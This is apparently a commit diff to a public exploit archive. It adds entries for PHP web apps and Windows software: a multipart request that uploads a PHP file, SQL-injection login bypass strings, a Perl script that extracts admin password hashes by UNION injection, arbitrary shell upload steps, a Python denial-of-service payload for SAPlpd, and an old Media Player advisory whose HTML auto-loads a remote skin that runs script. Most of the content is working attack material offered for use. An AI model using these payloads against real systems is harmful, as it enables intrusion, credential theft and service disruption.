Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
|
||||
|
||||
Connection: close
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_rating"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="g"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
|
||||
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
eval("echo'hello world';");
|
||||
|
||||
?>
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="submit_comment_post_19[save]"
|
||||
|
||||
|
||||
|
||||
Send comment
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="crumb_comment"
|
||||
|
||||
|
||||
|
||||
dXuthsKjMjhG2dnhADtzzOW414qV6Qky
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_type"
|
||||
|
||||
|
||||
|
||||
comment
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_item_ID"
|
||||
|
||||
|
||||
|
||||
19
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="redirect_to"
|
||||
|
||||
|
||||
|
||||
http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL—
|
||||
16
platforms/php/webapps/41028.txt
Executable file
16
platforms/php/webapps/41028.txt
Executable file
|
|
@ -0,0 +1,16 @@
|
|||
# Vulnerability: Job Portal Script v9.11 Authentication bypass
|
||||
# Date: 12.01.2017
|
||||
# Software link: http://itechscripts.com/job-portal-script/
|
||||
# Demo: http://job-portal.itechscripts.com
|
||||
# Price: 199$
|
||||
# Category: webapps
|
||||
# Exploit Author: Dawid Morawski
|
||||
# Website: http://www.morawskiweb.pl
|
||||
# Contact: dawid.morawski1990@gmail.com
|
||||
#######################################
|
||||
|
||||
|
||||
Go to http://localhost/[PATH]/admin/index.php and set:
|
||||
|
||||
Username: admin
|
||||
Password: ' or '1'='1
|
||||
16
platforms/php/webapps/41029.txt
Executable file
16
platforms/php/webapps/41029.txt
Executable file
|
|
@ -0,0 +1,16 @@
|
|||
# Vulnerability: Online Food Delivery v2.04 Authentication bypass
|
||||
# Date: 12.01.2017
|
||||
# Software link: http://itechscripts.com/food-delivery/
|
||||
# Demo: http://restaurant.itechscripts.com
|
||||
# Price: 49$
|
||||
# Category: webapps
|
||||
# Exploit Author: Dawid Morawski
|
||||
# Website: http://www.morawskiweb.pl
|
||||
# Contact: dawid.morawski1990@gmail.com
|
||||
#######################################
|
||||
|
||||
|
||||
Go to http://localhost/[PATH]/admin/admin_login.php and set:
|
||||
|
||||
Username: 1' or 1=1 -- -
|
||||
Password: anything
|
||||
39
platforms/php/webapps/41032.pl
Executable file
39
platforms/php/webapps/41032.pl
Executable file
|
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/perl -w
|
||||
|
||||
# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
|
||||
# Author : v3n0m
|
||||
# Contact : v3n0m[at]outlook[dot]com
|
||||
# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia
|
||||
# Software : Freelancer Script
|
||||
# Version : 5.11 Lower versions may also be affected
|
||||
# Price : US$199.00
|
||||
# Link : http://itechscripts.com/freelancer-script/
|
||||
# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
|
||||
sub clear{
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
}
|
||||
clear();
|
||||
print "|----------------------------------------------------|\n";
|
||||
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
|
||||
print "| Coded by : v3n0m |\n";
|
||||
print "| Greetz : YOGYACARDERLINK |\n";
|
||||
print "|----------------------------------------------------|\n";
|
||||
use LWP::UserAgent;
|
||||
print "\nInsert Target:[http://wwww.target.com/path/]: ";
|
||||
chomp(my $target=<STDIN>);
|
||||
print "\n[!] Exploiting Progress...\n";
|
||||
print "\n";
|
||||
$concat="group_concat(username,char(58),password)";
|
||||
$table="admin_user";
|
||||
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
|
||||
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
||||
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
|
||||
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $xf2r->content;
|
||||
if ($answer =~/([0-9a-fA-F]{32})/) {
|
||||
print "\n[+] Admin Password : $1\n";
|
||||
print "[+] Success !! Check target for details...\n";
|
||||
print "\n";
|
||||
}
|
||||
else{print "\n[-] Failed\n";
|
||||
}
|
||||
17
platforms/php/webapps/41034.txt
Executable file
17
platforms/php/webapps/41034.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Vulnerability: School Management Software v2.75 - SQL Injection Web Vulnerability
|
||||
# Google Dork: School Management Software
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://itechscripts.com/school-management-software/
|
||||
# Script Name: School Management Software
|
||||
# Script Version: v2.75
|
||||
# Script Buy Now: http://itechscripts.com/school-management-software/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]//notice-edit.php?aid=[SQL]
|
||||
# E.t.c.... Other files, too. There are security vulnerabilities.
|
||||
# # # # #
|
||||
16
platforms/php/webapps/41035.txt
Executable file
16
platforms/php/webapps/41035.txt
Executable file
|
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: Airbnb Clone Script
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/airbnb-clone/
|
||||
# Script Name: Airbnb Clone Script
|
||||
# Script Buy Now: http://www.hotscripts.com/listing/airbnb-clone-tibsolutions/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
||||
#
|
||||
15
platforms/php/webapps/41036.txt
Executable file
15
platforms/php/webapps/41036.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: Penny Auction Script
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
|
||||
# Script Name: Penny Auction Script
|
||||
# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
||||
15
platforms/php/webapps/41037.txt
Executable file
15
platforms/php/webapps/41037.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: ECommerce-TIBSECART
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/tibs-ecart/
|
||||
# Script Name: ECommerce-TIBSECART
|
||||
# Script Buy Now: http://www.tibsolutions.com/tibs-ecart/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
||||
15
platforms/php/webapps/41038.txt
Executable file
15
platforms/php/webapps/41038.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: ECommerce-Multi-Vendor Software
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/multi-vendor/
|
||||
# Script Name: ECommerce-Multi-Vendor Software
|
||||
# Script Buy Now: http://www.tibsolutions.com/multi-vendor/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
||||
|
|
@ -298,7 +298,7 @@ function find_username ()
|
|||
global $url, $fid, $adminid;
|
||||
|
||||
$req = "name=PNphpBB2&file=viewforum&f=".$fid;
|
||||
$str = "file=profile&mode=viewprofile&u=".$adminid;
|
||||
$str = "file=profile&mode=viewprofile&u=".$adminid;
|
||||
|
||||
$html = Send($url, $req);
|
||||
|
||||
|
|
|
|||
24
platforms/windows/dos/41030.py
Executable file
24
platforms/windows/dos/41030.py
Executable file
|
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: SAPlpd 7.40 Denial of Service
|
||||
# Date: 2016-12-28
|
||||
# Exploit Author: Peter Baris
|
||||
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
|
||||
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
|
||||
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
|
||||
# So you can modify the DoS accordingly
|
||||
# The added 800 A's are just to show, that you can deliver a complete shell with the command
|
||||
|
||||
DoS = ("\x03"+"\x0a"+"\x41"*800)
|
||||
|
||||
|
||||
s = socket.socket()
|
||||
s.settimeout(1)
|
||||
s.connect(('192.168.198.132', 515))
|
||||
print("[*] Crashing SAPlpd 7.40")
|
||||
print("[*] Payload length: "+str(len(DoS))+" bytes")
|
||||
s.send(DoS)
|
||||
s.close()
|
||||
15
platforms/windows/local/41031.txt
Executable file
15
platforms/windows/local/41031.txt
Executable file
|
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
|
||||
# Date: 2017-01-12
|
||||
# Exploit Author: Peter Baris
|
||||
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
|
||||
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
|
||||
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe
|
||||
# Version: 1.0.0.1
|
||||
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
|
||||
|
||||
POC:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41031.zip
|
||||
|
||||
|
||||
|
||||
188
platforms/windows/remote/20424.txt
Executable file
188
platforms/windows/remote/20424.txt
Executable file
|
|
@ -0,0 +1,188 @@
|
|||
----[Title:
|
||||
|
||||
[ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
|
||||
Arbitrary Code
|
||||
|
||||
|
||||
|
||||
|
||||
----[Published:
|
||||
|
||||
23.NOV.2000
|
||||
|
||||
|
||||
----[Vendor Status:
|
||||
|
||||
Microsoft has been informed and we have worked with them to release
|
||||
a patch.
|
||||
|
||||
|
||||
|
||||
----[Systems Affected:
|
||||
|
||||
|
||||
Windows ME (WMP7 is installed by default)
|
||||
and 95,98 NT and 2000, using:
|
||||
|
||||
* Windows Media Player 7
|
||||
|
||||
and
|
||||
|
||||
* Internet Explorer 3+,
|
||||
|
||||
* Outlook Express 2000,
|
||||
|
||||
* Outlook Express 98,
|
||||
|
||||
* Outlook 2000,
|
||||
|
||||
* Outlook 98
|
||||
|
||||
* possibly all other HTML and/or
|
||||
javascript enabled e-mail clients.
|
||||
|
||||
|
||||
|
||||
----[The problem:
|
||||
|
||||
|
||||
GFI, developer of email content checking & network
|
||||
security software, has recently discovered a security flaw
|
||||
within Windows Media Player which allows a malicious user
|
||||
to run arbitary code on a target machine as it attempts to
|
||||
view a website or an HTML E-mail.
|
||||
|
||||
|
||||
The problem is exploited by embedding a javascript (.js) file within a
|
||||
Media Player skin file (.wmz) which can also be embeded in a Windows Media
|
||||
Download file (.wmd). This does not require the user to run any attachments
|
||||
since the Media Player file is automatically executed using a iframe tag
|
||||
or a window.open() with in a <script> tag.
|
||||
|
||||
|
||||
|
||||
----[Proof of concept Exploit:
|
||||
|
||||
<Embedded within an HTML file or e-mail>
|
||||
|
||||
E-mail Example 1.
|
||||
|
||||
<head>
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
||||
alert('This exploit will now open a new window\n
|
||||
and automatically download the wmd file\n
|
||||
and execute it. This will create a file named\n
|
||||
gfiseclab.txt in your C:\\');
|
||||
window.open(theURL,winName,features);
|
||||
}
|
||||
//-->
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body bgcolor="#FFFFFF"
|
||||
|
||||
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
|
||||
</Embedded within an HTML e-mail>
|
||||
|
||||
|
||||
|
||||
E-mail Example 2.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
alert('This exploit will now open a new window \n and automatically download
|
||||
the wmd file \n
|
||||
|
||||
and execute it. This will create a file named \n gfiseclab.txt in your
|
||||
C:\\')</script>
|
||||
<iframe src="http://website/test.wmd";></iframe></body>
|
||||
</html>
|
||||
|
||||
-------------------------------------
|
||||
|
||||
|
||||
|
||||
test.wmd is a compressed zip file which contains the following files:
|
||||
|
||||
* test.asx: meta file which points to an mpg file and
|
||||
the exploit skin file
|
||||
|
||||
* test.mpg: an example mpeg movie.
|
||||
|
||||
* test.wmz: the exploit skin file.
|
||||
|
||||
|
||||
|
||||
test.wmz is also a compressed zip file containing:
|
||||
|
||||
* test.js: our javascript which contains the following code
|
||||
************************************
|
||||
var fso, f1;
|
||||
fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
|
||||
|
||||
function onload(){
|
||||
playAgain();
|
||||
}
|
||||
************************************
|
||||
|
||||
* test.wms: another metafile which calls test.js
|
||||
|
||||
-------------------------------------
|
||||
|
||||
|
||||
----[Solution:
|
||||
|
||||
For e-mail the best solution is to apply filtering on incoming e-mails via
|
||||
the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
|
||||
|
||||
meta refresh tags and possibly ActiveX tags. This means that users should
|
||||
not worry about receiving malicious email and spreading worms etc.
|
||||
|
||||
|
||||
Consider unregistering .wmd and .wmz so from being associated with Media
|
||||
Player 7 until a vendor patch is applied. Procedure:
|
||||
|
||||
In Windows Explorer click on View>Options>File Types and delete the
|
||||
following entries:
|
||||
|
||||
|
||||
* Windows Media Player Skin Package.
|
||||
|
||||
* Windows Media Player Download Package.
|
||||
|
||||
|
||||
|
||||
This should provide some better protection.
|
||||
|
||||
|
||||
|
||||
----[Reference:
|
||||
|
||||
http://www.gfi.com/press/memp7exploitpr.htm
|
||||
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
|
||||
|
||||
|
||||
|
||||
----[Contact Information:
|
||||
|
||||
Sandro Gauci
|
||||
GFI Security Lab
|
||||
sandro@xxxxxxx
|
||||
http://www.gfi.com
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/1976/info
|
||||
|
||||
Windows Media Player is an application used for digital audio, and video content viewing.
|
||||
|
||||
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
|
||||
|
||||
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
|
||||
Loading…
Add table
Reference in a new issue